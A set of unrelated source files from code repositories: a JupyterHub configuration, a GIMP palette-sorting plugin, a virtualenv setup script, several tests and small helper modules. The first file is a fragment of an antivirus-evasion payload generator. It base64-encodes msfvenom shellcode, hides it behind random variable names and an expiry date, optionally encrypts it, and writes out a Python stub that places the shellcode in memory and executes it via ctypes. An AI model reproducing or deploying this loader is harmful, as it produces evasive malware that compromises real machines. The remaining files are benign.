if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
|
g0tmi1k/veil-Evasion
|
modules/payloads/python/shellcode_inject/base64_substitution.py
|
Python
|
gpl-3.0
| 16,041
|
# (C) British Crown Copyright 2016, Met Office
#
# This file is part of Biggus.
#
# Biggus is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Biggus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Biggus. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for `biggus._init`"""
from __future__ import absolute_import, division, print_function
from six.moves import (filter, input, map, range, zip) # noqa
|
pelson/biggus
|
biggus/tests/unit/init/__init__.py
|
Python
|
gpl-3.0
| 882
|
# THIS FILE IS CONTROLLED BY ELASTICLUSTER
# local modifications will be overwritten
# the next time `elasticluster setup` is run!
#
#
# Configuration file for jupyterhub.
#
#------------------------------------------------------------------------------
# JupyterHub(Application) configuration
#------------------------------------------------------------------------------
## An Application for starting a Multi-User Jupyter Notebook server.
## Grant admin users permission to access single-user servers.
#
# Users should be properly informed if this is enabled.
#c.JupyterHub.admin_access = False
## Class for authenticating users.
#
c.JupyterHub.authenticator_class = 'jupyterhub.auth.PAMAuthenticator'
## The base URL of the entire application
c.JupyterHub.base_url = '/'
## Whether to shutdown the proxy when the Hub shuts down.
#
#c.JupyterHub.cleanup_proxy = True
## Whether to shutdown single-user servers when the Hub shuts down.
#
#c.JupyterHub.cleanup_servers = True
## The config file to load
c.JupyterHub.config_file = '/etc/jupyterhub/jupyterhub_config.py'
## Number of days for a login cookie to be valid. Default is two weeks.
#
#c.JupyterHub.cookie_max_age_days = 14
## The cookie secret to use to encrypt cookies.
#
# Loaded from the JPY_COOKIE_SECRET env variable by default.
c.JupyterHub.cookie_secret = open('/var/lib/jupyterhub/jupyterhub_cookie_secret', 'rb').read().strip()
## File in which to store the cookie secret.
c.JupyterHub.cookie_secret_file = 'jupyterhub_cookie_secret'
## The location of jupyterhub data files (e.g. /usr/local/share/jupyter/hub)
c.JupyterHub.data_files_path = '/opt/anaconda3/share/jupyter/hub'
## Include any kwargs to pass to the database connection. See
# sqlalchemy.create_engine for details.
#c.JupyterHub.db_kwargs = {}
## url for the database. e.g. `sqlite:///jupyterhub.sqlite`
c.JupyterHub.db_url = 'sqlite:////var/lib/jupyterhub/jupyterhub.sqlite'
## show debug output in configurable-http-proxy
#c.JupyterHub.debug_proxy = False
## File to write PID. Useful for daemonizing jupyterhub.
c.JupyterHub.pid_file = '/var/run/jupyterhub.pid'
## The public facing port of the proxy
c.JupyterHub.port = 443
## The Proxy Auth token.
#
# Loaded from the CONFIGPROXY_AUTH_TOKEN env variable by default.
c.JupyterHub.proxy_auth_token = open('/var/lib/jupyterhub/jupyterhub_proxy_auth_token', 'rb').read().strip()
## The command to start the http proxy.
#
# Only override if configurable-http-proxy is not on your PATH
c.JupyterHub.proxy_cmd = ['/usr/local/lib/node_modules/configurable-http-proxy/bin/configurable-http-proxy']
## Dict of token:servicename to be loaded into the database.
#
# Allows ahead-of-time generation of API tokens for use by externally managed
# services.
#c.JupyterHub.service_tokens = {}
## List of service specification dictionaries.
#
# A service
#
# For instance::
#
# services = [
# {
# 'name': 'cull_idle',
# 'command': ['/path/to/cull_idle_servers.py'],
# },
# {
# 'name': 'formgrader',
# 'url': 'http://127.0.0.1:1234',
# 'token': 'super-secret',
# 'environment':
# }
# ]
#c.JupyterHub.services = []
## The class to use for spawning single-user servers.
#
c.JupyterHub.spawner_class = 'jupyterhub.spawner.LocalProcessSpawner'
## Path to SSL certificate file for the public facing interface of the proxy
#
# Use with ssl_key
c.JupyterHub.ssl_cert = '/etc/jupyterhub/jupyterhub.crt.pem'
## Path to SSL key file for the public facing interface of the proxy
#
# Use with ssl_cert
c.JupyterHub.ssl_key = '/etc/jupyterhub/jupyterhub.key.pem'
#------------------------------------------------------------------------------
# Spawner(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## The command used for starting the single-user server.
#
# Provide either a string or a list containing the path to the startup script
# command. Extra arguments, other than this path, should be provided via `args`.
#
# This is usually set if you want to start the single-user server in a different
# python environment (with virtualenv/conda) than JupyterHub itself.
#
# Some spawners allow shell-style expansion here, allowing you to use
# environment variables. Most, including the default, do not. Consult the
# documentation for your spawner to verify!
c.Spawner.cmd = ['/opt/anaconda3/bin/jupyterhub-singleuser']
## Minimum number of cpu-cores a single-user notebook server is guaranteed to
# have available.
#
# If this value is set to 0.5, allows use of 50% of one CPU. If this value is
# set to 2, allows use of up to 2 CPUs.
#
# Note that this needs to be supported by your spawner for it to work.
#c.Spawner.cpu_guarantee = None
## Maximum number of cpu-cores a single-user notebook server is allowed to use.
#
# If this value is set to 0.5, allows use of 50% of one CPU. If this value is
# set to 2, allows use of up to 2 CPUs.
#
# The single-user notebook server will never be scheduled by the kernel to use
# more cpu-cores than this. There is no guarantee that it can access this many
# cpu-cores.
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.cpu_limit = None
## Enable debug-logging of the single-user server
#c.Spawner.debug = False
## The URL the single-user server should start in.
#
# `{username}` will be expanded to the user's username
#
# Example uses:
# - You can set `notebook_dir` to `/` and `default_url` to `/home/{username}` to allow people to
# navigate the whole filesystem from their notebook, but still start in their home directory.
# - You can set this to `/lab` to have JupyterLab start by default, rather than Jupyter Notebook.
#c.Spawner.default_url = ''
## Disable per-user configuration of single-user servers.
#
# When starting the user's single-user server, any config file found in the
# user's $HOME directory will be ignored.
#
# Note: a user could circumvent this if the user modifies their Python
# environment, such as when they have their own conda environments / virtualenvs
# / containers.
#c.Spawner.disable_user_config = False
## Whitelist of environment variables for the single-user server to inherit from
# the JupyterHub process.
#
# This whitelist is used to ensure that sensitive information in the JupyterHub
# process's environment (such as `CONFIGPROXY_AUTH_TOKEN`) is not passed to the
# single-user server's process.
#c.Spawner.env_keep = ['PATH', 'PYTHONPATH', 'CONDA_ROOT', 'CONDA_DEFAULT_ENV', 'VIRTUAL_ENV', 'LANG', 'LC_ALL']
## Extra environment variables to set for the single-user server's process.
#
# Environment variables that end up in the single-user server's process come from 3 sources:
# - This `environment` configurable
# - The JupyterHub process' environment variables that are whitelisted in `env_keep`
# - Variables to establish contact between the single-user notebook and the hub (such as JUPYTERHUB_API_TOKEN)
#
# The `environment` configurable should be set by JupyterHub administrators to
# add installation specific environment variables. It is a dict where the key is
# the name of the environment variable, and the value can be a string or a
# callable. If it is a callable, it will be called with one parameter (the
# spawner instance), and should return a string fairly quickly (no blocking
# operations please!).
#
# Note that the spawner class' interface is not guaranteed to be exactly same
# across upgrades, so if you are using the callable take care to verify it
# continues to work after upgrades!
#c.Spawner.environment = {}
## Timeout (in seconds) before giving up on a spawned HTTP server
#
# Once a server has successfully been spawned, this is the amount of time we
# wait before assuming that the server is unable to accept connections.
#c.Spawner.http_timeout = 30
## The IP address (or hostname) the single-user server should listen on.
#
# The JupyterHub proxy implementation should be able to send packets to this
# interface.
#c.Spawner.ip = '127.0.0.1'
## Minimum number of bytes a single-user notebook server is guaranteed to have
# available.
#
# Allows the following suffixes:
# - K -> Kilobytes
# - M -> Megabytes
# - G -> Gigabytes
# - T -> Terabytes
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.mem_guarantee = None
## Maximum number of bytes a single-user notebook server is allowed to use.
#
# Allows the following suffixes:
# - K -> Kilobytes
# - M -> Megabytes
# - G -> Gigabytes
# - T -> Terabytes
#
# If the single user server tries to allocate more memory than this, it will
# fail. There is no guarantee that the single-user notebook server will be able
# to allocate this much memory - only that it can not allocate more than this.
#
# This needs to be supported by your spawner for it to work.
#c.Spawner.mem_limit = None
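#  e.g. (illustrative values only, not part of the generated deployment file):
#c.Spawner.mem_guarantee = '512M'
#c.Spawner.mem_limit = '2G'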
## Path to the notebook directory for the single-user server.
#
# The user sees a file listing of this directory when the notebook interface is
# started. The current interface does not easily allow browsing beyond the
# subdirectories in this directory's tree.
#
# `~` will be expanded to the home directory of the user, and {username} will be
# replaced with the name of the user.
#
# Note that this does *not* prevent users from accessing files outside of this
# path! They can do so with many other means.
c.Spawner.notebook_dir = '~'
#------------------------------------------------------------------------------
# Authenticator(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Base class for implementing an authentication provider for JupyterHub
## Set of users that will have admin rights on this JupyterHub.
#
# Admin users have extra privileges:
# - Use the admin panel to see list of users logged in
# - Add / remove users in some authenticators
# - Restart / halt the hub
# - Start / stop users' single-user servers
# - Can access each individual user's single-user server (if configured)
#
# Admin access should be treated the same way root access is.
#
# Defaults to an empty set, in which case no user has admin access.
#c.Authenticator.admin_users = set()
## Whitelist of usernames that are allowed to log in.
#
# Use this with supported authenticators to restrict which users can log in.
# This is an additional whitelist that further restricts users, beyond whatever
# restrictions the authenticator has in place.
#
# If empty, does not perform any additional restriction.
#c.Authenticator.whitelist = set()
#------------------------------------------------------------------------------
# LocalAuthenticator(Authenticator) configuration
#------------------------------------------------------------------------------
## Base class for Authenticators that work with local Linux/UNIX users
#
# Checks for local users, and can attempt to create them if they do not exist.
## The command to use for creating users as a list of strings
#
# For each element in the list, the string USERNAME will be replaced with the
# user's username. The username will also be appended as the final argument.
#
# For Linux, the default value is:
#
# ['adduser', '-q', '--gecos', '""', '--disabled-password']
#
# To specify a custom home directory, set this to:
#
# ['adduser', '-q', '--gecos', '""', '--home', '/customhome/USERNAME', '--
# disabled-password']
#
# This will run the command:
#
# adduser -q --gecos "" --home /customhome/river --disabled-password river
#
# when the user 'river' is created.
#c.LocalAuthenticator.add_user_cmd = []
## If set to True, will attempt to create local system users if they do not exist
# already.
#
# Supports Linux and BSD variants only.
c.LocalAuthenticator.create_system_users = False
## Whitelist all users from this UNIX group.
#
# This makes the username whitelist ineffective.
#c.LocalAuthenticator.group_whitelist = set()
#------------------------------------------------------------------------------
# PAMAuthenticator(LocalAuthenticator) configuration
#------------------------------------------------------------------------------
## Authenticate local UNIX users with PAM
## The text encoding to use when communicating with PAM
#c.PAMAuthenticator.encoding = 'utf8'
## Whether to open a new PAM session when spawners are started.
#
# This may trigger things like mounting shared filesystems, loading credentials,
# etc. depending on system configuration, but it does not always work.
#
# If any errors are encountered when opening/closing PAM sessions, this is
# automatically set to False.
#c.PAMAuthenticator.open_sessions = True
## The name of the PAM service to use for authentication
#c.PAMAuthenticator.service = 'login'
|
TissueMAPS/TmDeploy
|
elasticluster/elasticluster/share/playbooks/roles/jupyterhub/files/etc/jupyterhub/jupyterhub_config.py
|
Python
|
gpl-3.0
| 12,907
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gimpfu import *
# little known, colorsys is part of Python's stdlib
from colorsys import rgb_to_yiq
from textwrap import dedent
from random import randint
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
AVAILABLE_CHANNELS = (_("Red"), _("Green"), _("Blue"),
_("Luma (Y)"),
_("Hue"), _("Saturation"), _("Value"),
_("Saturation (HSL)"), _("Lightness (HSL)"),
_("Index"),
_("Random"))
GRAIN_SCALE = (1.0, 1.0 , 1.0,
1.0,
360., 100., 100.,
100., 100.,
16384.,
float(0x7ffffff),
100., 256., 256.,
256., 360.,)
SELECT_ALL = 0
SELECT_SLICE = 1
SELECT_AUTOSLICE = 2
SELECT_PARTITIONED = 3
SELECTIONS = (SELECT_ALL, SELECT_SLICE, SELECT_AUTOSLICE, SELECT_PARTITIONED)
def noop(v, i):
return v
def to_hsv(v, i):
return v.to_hsv()
def to_hsl(v, i):
return v.to_hsl()
def to_yiq(v, i):
return rgb_to_yiq(*v[:-1])
def to_index(v, i):
return (i,)
def to_random(v, i):
return (randint(0, 0x7fffffff),)
channel_getters = [ (noop, 0), (noop, 1), (noop, 2),
(to_yiq, 0),
(to_hsv, 0), (to_hsv, 1), (to_hsv, 2),
(to_hsl, 1), (to_hsl, 2),
(to_index, 0),
(to_random, 0)]
try:
from colormath.color_objects import RGBColor, LabColor, LCHabColor
AVAILABLE_CHANNELS = AVAILABLE_CHANNELS + (_("Lightness (LAB)"),
_("A-color"), _("B-color"),
_("Chroma (LCHab)"),
_("Hue (LCHab)"))
to_lab = lambda v,i: RGBColor(*v[:-1]).convert_to('LAB').get_value_tuple()
to_lchab = (lambda v,i:
RGBColor(*v[:-1]).convert_to('LCHab').get_value_tuple())
channel_getters.extend([(to_lab, 0), (to_lab, 1), (to_lab, 2),
(to_lchab, 1), (to_lchab, 2)])
except ImportError:
pass
def parse_slice(s, numcolors):
"""Parse a slice spec and return (start, nrows, length)
All items are optional. Omitting them makes the largest possible selection that
exactly fits the other items.
start:nrows,length
'' selects all items, as does ':'
':4,' makes a 4-row selection out of all colors (length auto-determined)
':4' also.
':1,4' selects the first 4 colors
':,4' selects rows of 4 colors (nrows auto-determined)
':4,4' selects 4 rows of 4 colors
'4:' selects a single row of all colors after 4, inclusive.
'4:,4' selects rows of 4 colors, starting at 4 (nrows auto-determined)
'4:4,4' selects 4 rows of 4 colors (16 colors total), beginning at index 4.
'4' is illegal (ambiguous)
In general, slices are comparable to a numpy sub-array.
'start at element START, with shape (NROWS, LENGTH)'
"""
s = s.strip()
def notunderstood():
raise ValueError('Slice %r not understood. Should be in format'
' START?:NROWS?,ROWLENGTH? eg. "0:4,16".' % s)
def _int(v):
try:
return int(v)
except ValueError:
notunderstood()
if s in ('', ':', ':,'):
return 0, 1, numcolors # entire palette, one row
if s.count(':') != 1:
notunderstood()
rowpos = s.find(':')
start = 0
if rowpos > 0:
start = _int(s[:rowpos])
numcolors -= start
nrows = 1
if ',' in s:
commapos = s.find(',')
nrows = s[rowpos+1:commapos]
length = s[commapos+1:]
if not nrows:
if not length:
notunderstood()
else:
length = _int(length)
if length == 0:
notunderstood()
nrows = numcolors // length
if numcolors % length:
nrows = -nrows
elif not length:
nrows = _int(nrows)
if nrows == 0:
notunderstood()
length = numcolors // nrows
if numcolors % nrows:
length = -length
else:
nrows = _int(nrows)
if nrows == 0:
notunderstood()
length = _int(length)
if length == 0:
notunderstood()
else:
nrows = _int(s[rowpos+1:])
if nrows == 0:
notunderstood()
length = numcolors // nrows
if numcolors % nrows:
length = -length
return start, nrows, length
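def _parse_slice_examples():  # pragma: no cover
    """Hedged self-check (not part of the upstream plug-in): a few of the
    docstring examples above, exercised against a 16-colour palette."""
    assert parse_slice('', 16) == (0, 1, 16)       # whole palette, one row
    assert parse_slice(':4,', 16) == (0, 4, 4)     # 4 rows, length auto-determined
    assert parse_slice(':1,4', 16) == (0, 1, 4)    # the first 4 colours
    assert parse_slice('4:4,4', 20) == (4, 4, 4)   # 4x4 block starting at index 4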
def quantization_grain(channel, g):
"Given a channel and a quantization, return the size of a quantization grain"
g = max(1.0, g)
if g <= 1.0:
g = 0.00001
else:
g = max(0.00001, GRAIN_SCALE[channel] / g)
return g
def palette_sort(palette, selection, slice_expr, channel1, ascending1,
channel2, ascending2, quantize, pchannel, pquantize):
grain1 = quantization_grain(channel1, quantize)
grain2 = quantization_grain(channel2, quantize)
pgrain = quantization_grain(pchannel, pquantize)
#If palette is read only, work on a copy:
editable = pdb.gimp_palette_is_editable(palette)
if not editable:
palette = pdb.gimp_palette_duplicate (palette)
num_colors = pdb.gimp_palette_get_info (palette)
start, nrows, length = None, None, None
if selection == SELECT_AUTOSLICE:
def find_index(color, startindex=0):
for i in range(startindex, num_colors):
c = pdb.gimp_palette_entry_get_color (palette, i)
if c == color:
return i
return None
def hexcolor(c):
return "#%02x%02x%02x" % tuple(c[:-1])
fg = pdb.gimp_context_get_foreground()
bg = pdb.gimp_context_get_background()
start = find_index(fg)
end = find_index(bg)
if start is None:
raise ValueError("Couldn't find foreground color %r in palette" % list(fg))
if end is None:
raise ValueError("Couldn't find background color %r in palette" % list(bg))
if find_index(fg, start + 1):
raise ValueError('Autoslice cannot be used when more than one'
' instance of an endpoint'
' (%s) is present' % hexcolor(fg))
if find_index(bg, end + 1):
raise ValueError('Autoslice cannot be used when more than one'
' instance of an endpoint'
' (%s) is present' % hexcolor(bg))
if start > end:
end, start = start, end
length = (end - start) + 1
try:
_, nrows, _ = parse_slice(slice_expr, length)
nrows = abs(nrows)
if length % nrows:
raise ValueError('Total length %d not evenly divisible'
' by number of rows %d' % (length, nrows))
length /= nrows
except ValueError:
# bad expression is okay here, just assume one row
nrows = 1
# remaining behaviour is implemented by SELECT_SLICE 'inheritance'.
        selection = SELECT_SLICE
elif selection in (SELECT_SLICE, SELECT_PARTITIONED):
start, nrows, length = parse_slice(slice_expr, num_colors)
channels_getter_1, channel_index = channel_getters[channel1]
channels_getter_2, channel2_index = channel_getters[channel2]
def get_colors(start, end):
result = []
for i in range(start, end):
entry = (pdb.gimp_palette_entry_get_name (palette, i),
pdb.gimp_palette_entry_get_color (palette, i))
index1 = channels_getter_1(entry[1], i)[channel_index]
index2 = channels_getter_2(entry[1], i)[channel2_index]
index = ((index1 - (index1 % grain1)) * (1 if ascending1 else -1),
(index2 - (index2 % grain2)) * (1 if ascending2 else -1)
)
result.append((index, entry))
return result
if selection == SELECT_ALL:
entry_list = get_colors(0, num_colors)
entry_list.sort(key=lambda v:v[0])
for i in range(num_colors):
pdb.gimp_palette_entry_set_name (palette, i, entry_list[i][1][0])
pdb.gimp_palette_entry_set_color (palette, i, entry_list[i][1][1])
elif selection == SELECT_PARTITIONED:
if num_colors < (start + length * nrows) - 1:
raise ValueError('Not enough entries in palette to '
'sort complete rows! Got %d, expected >=%d' %
(num_colors, start + length * nrows))
pchannels_getter, pchannel_index = channel_getters[pchannel]
for row in range(nrows):
partition_spans = [1]
rowstart = start + (row * length)
old_color = pdb.gimp_palette_entry_get_color (palette,
rowstart)
old_partition = pchannels_getter(old_color, rowstart)[pchannel_index]
old_partition = old_partition - (old_partition % pgrain)
for i in range(rowstart + 1, rowstart + length):
this_color = pdb.gimp_palette_entry_get_color (palette, i)
this_partition = pchannels_getter(this_color, i)[pchannel_index]
this_partition = this_partition - (this_partition % pgrain)
if this_partition == old_partition:
partition_spans[-1] += 1
else:
partition_spans.append(1)
old_partition = this_partition
base = rowstart
for size in partition_spans:
                # recursively sort each partition as a single one-row slice
                palette_sort(palette, SELECT_SLICE, '%d:1,%d' % (base, size),
                             channel1, ascending1, channel2, ascending2,
                             quantize, pchannel, pquantize)
base += size
else:
stride = length
if num_colors < (start + stride * nrows) - 1:
raise ValueError('Not enough entries in palette to sort '
'complete rows! Got %d, expected >=%d' %
(num_colors, start + stride * nrows))
for row_start in range(start, start + stride * nrows, stride):
sublist = get_colors(row_start, row_start + stride)
sublist.sort(key=lambda v:v[0], reverse=not ascending)
for i, entry in zip(range(row_start, row_start + stride), sublist):
pdb.gimp_palette_entry_set_name (palette, i, entry[1][0])
pdb.gimp_palette_entry_set_color (palette, i, entry[1][1])
return palette
register(
"python-fu-palette-sort",
N_("Sort the colors in a palette"),
# FIXME: Write humanly readable help -
# (I can't figure out what the plugin does, or how to use the parameters after
# David's enhacements even looking at the code -
# let alone someone just using GIMP (JS) )
dedent("""\
palette_sort (palette, selection, slice_expr, channel,
channel2, quantize, ascending, pchannel, pquantize) -> new_palette
Sorts a palette, or part of a palette, using several options.
One can select two color channels over which to sort,
and several auxiliary parameters create a 2D sorted
palette with sorted rows, among other things.
One can optionally install colormath
(https://pypi.python.org/pypi/colormath/1.0.8)
to GIMP's Python to get even more channels to choose from.
"""),
"João S. O. Bueno, Carol Spears, David Gowers",
"João S. O. Bueno, Carol Spears, David Gowers",
"2006-2014",
N_("_Sort Palette..."),
"",
[
(PF_PALETTE, "palette", _("Palette"), ""),
(PF_OPTION, "selections", _("Se_lections"), SELECT_ALL,
(_("All"), _("Slice / Array"), _("Autoslice (fg->bg)"),
_("Partitioned"))),
(PF_STRING, "slice-expr", _("Slice _expression"), ''),
(PF_OPTION, "channel1", _("Channel to _sort"), 3,
AVAILABLE_CHANNELS),
(PF_BOOL, "ascending1", _("_Ascending"), True),
(PF_OPTION, "channel2", _("Secondary Channel to s_ort"), 5,
AVAILABLE_CHANNELS),
(PF_BOOL, "ascending2", _("_Ascending"), True),
(PF_FLOAT, "quantize", _("_Quantization"), 0.0),
(PF_OPTION, "pchannel", _("_Partitioning channel"), 3,
AVAILABLE_CHANNELS),
(PF_FLOAT, "pquantize", _("Partition q_uantization"), 0.0),
],
[],
palette_sort,
menu="<Palettes>",
domain=("gimp20-python", gimp.locale_directory)
)
main ()
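# Hedged usage sketch (not part of the upstream plug-in): once registered, the
# procedure can also be driven from GIMP's Python-Fu console. The palette name
# is a placeholder; the arguments follow the PF_* list above.
#
#     pdb.python_fu_palette_sort('Default', 0, '',   # palette, SELECT_ALL, slice expr
#                                3, True,            # primary channel: Luma, ascending
#                                5, True,            # secondary channel: Saturation
#                                0.0, 3, 0.0)        # quantize, pchannel, pquantize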
|
brion/gimp
|
plug-ins/pygimp/plug-ins/palette-sort.py
|
Python
|
gpl-3.0
| 13,495
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
The script can be used to setup a virtual environment for running Firefox UI Tests.
It will automatically install the firefox ui test package, all its dependencies,
and optional packages if specified.
"""
import argparse
import os
import shutil
import subprocess
import sys
import urllib2
import zipfile
# Link to the folder, which contains the zip archives of virtualenv
VIRTUALENV_URL = 'https://github.com/pypa/virtualenv/archive/%(VERSION)s.zip'
VIRTUALENV_VERSION = '12.1.1'
here = os.path.dirname(os.path.abspath(__file__))
venv_script_path = 'Scripts' if sys.platform == 'win32' else 'bin'
venv_activate = os.path.join(venv_script_path, 'activate')
venv_activate_this = os.path.join(venv_script_path, 'activate_this.py')
venv_python_bin = os.path.join(venv_script_path, 'python')
usage_message = """
***********************************************************************
To run the Firefox UI Tests, activate the virtual environment:
{}{}
See firefox-ui-tests --help for all options
***********************************************************************
"""
def download(url, target):
"""Downloads the specified url to the given target."""
response = urllib2.urlopen(url)
with open(target, 'wb') as f:
f.write(response.read())
return target
def create_virtualenv(target, python_bin=None):
script_path = os.path.join(here, 'virtualenv-%s' % VIRTUALENV_VERSION,
'virtualenv.py')
print 'Downloading virtualenv %s' % VIRTUALENV_VERSION
zip_path = download(VIRTUALENV_URL % {'VERSION': VIRTUALENV_VERSION},
os.path.join(here, 'virtualenv.zip'))
try:
with zipfile.ZipFile(zip_path, 'r') as f:
f.extractall(here)
print 'Creating new virtual environment'
cmd_args = [sys.executable, script_path, target]
if python_bin:
cmd_args.extend(['-p', python_bin])
subprocess.check_call(cmd_args)
finally:
try:
os.remove(zip_path)
except OSError:
pass
shutil.rmtree(os.path.dirname(script_path), ignore_errors=True)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--python',
dest='python',
metavar='BINARY',
help='The Python interpreter to use.')
parser.add_argument('venv',
metavar='PATH',
help='Path to the environment to be created.')
args = parser.parse_args()
# Remove an already existent virtual environment
if os.path.exists(args.venv):
print 'Removing already existent virtual environment at: %s' % args.venv
shutil.rmtree(args.venv, True)
create_virtualenv(args.venv, python_bin=args.python)
# Activate the environment
venv = os.path.join(args.venv, venv_activate_this)
execfile(venv, dict(__file__=venv))
# Install Firefox UI tests, dependencies and optional packages
command = ['pip', 'install',
'-r', 'requirements.txt',
'-r', 'requirements_optional.txt',
]
print 'Installing Firefox UI Tests and dependencies...'
print 'Command: %s' % command
subprocess.check_call(command, cwd=os.path.dirname(here))
# Print the user instructions
print usage_message.format('' if sys.platform == 'win32' else 'source ',
os.path.join(args.venv, venv_activate))
if __name__ == "__main__":
main()
|
Motwani/firefox-ui-tests
|
.travis/create_venv.py
|
Python
|
mpl-2.0
| 3,764
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from nose.tools import ok_
from crontabber.app import CronTabber
from socorro.unittest.cron.jobs.base import IntegrationTestBase
from socorro.unittest.cron.setup_configman import (
get_config_manager_for_crontabber,
)
from socorro.schemas import CRASH_REPORT_JSON_SCHEMA_AS_STRING
class TestUploadCrashReportJSONSchemaCronApp(IntegrationTestBase):
def _setup_config_manager(self):
return get_config_manager_for_crontabber(
jobs='socorro.cron.jobs.upload_crash_report_json_schema.'
'UploadCrashReportJSONSchemaCronApp|30d',
)
@mock.patch('boto.connect_s3')
def test_run(self, connect_s3):
key = mock.MagicMock()
connect_s3().get_bucket().get_key.return_value = None
connect_s3().get_bucket().new_key.return_value = key
with self._setup_config_manager().context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
app_name = 'upload-crash-report-json-schema'
ok_(information[app_name])
ok_(not information[app_name]['last_error'])
ok_(information[app_name]['last_success'])
key.set_contents_from_string.assert_called_with(
CRASH_REPORT_JSON_SCHEMA_AS_STRING
)
|
m8ttyB/socorro
|
socorro/unittest/cron/jobs/test_upload_crash_report_json_schema.py
|
Python
|
mpl-2.0
| 1,523
|
# -*- coding: utf-8 -*-
# © 2015 Grupo ESOC Ingeniería de Servicios, S.L.U. - Jairo Llopis
# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl.html).
from openerp import api, models
class WebsiteMenu(models.Model):
_inherit = "website.menu"
@api.multi
def get_parents(self, revert=False, include_self=False):
"""List current menu's parents.
:param bool revert:
Indicates if the result must be revert before returning.
Activating this will mean that the result will be ordered from
parent to child.
:param bool include_self:
Indicates if the current menu item must be included in the result.
:return list:
Menu items ordered from child to parent, unless ``revert=True``.
"""
result = list()
menu = self if include_self else self.parent_id
while menu:
result.append(menu)
menu = menu.parent_id
return reversed(result) if revert else result
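def _breadcrumb_names(menu):
    """Hedged usage sketch (not part of the original module): return the
    breadcrumb trail for ``menu`` (a website.menu record), root first."""
    return [m.name for m in menu.get_parents(revert=True, include_self=True)]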
|
Tecnativa/website
|
website_breadcrumb/models/website.py
|
Python
|
agpl-3.0
| 1,026
|
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mocked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
    >>> assert receiver.call_count == 1
"""
if wraps is None:
        def wraps(*args, **kwargs):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
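# Hedged usage sketch (not part of the original module): ``wraps`` lets the
# mocked receiver keep calling a real handler while still recording calls.
# ``post_save`` and ``MyModel`` are placeholders for illustration.
#
#     def audit(sender, instance, **kwargs):
#         print('saved', instance)
#
#     with mock_signal_receiver(post_save, wraps=audit, sender=MyModel) as receiver:
#         MyModel.objects.create()
#         assert receiver.call_count == 1   # audit() ran as well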
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/mock_django/signals.py
|
Python
|
agpl-3.0
| 1,028
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
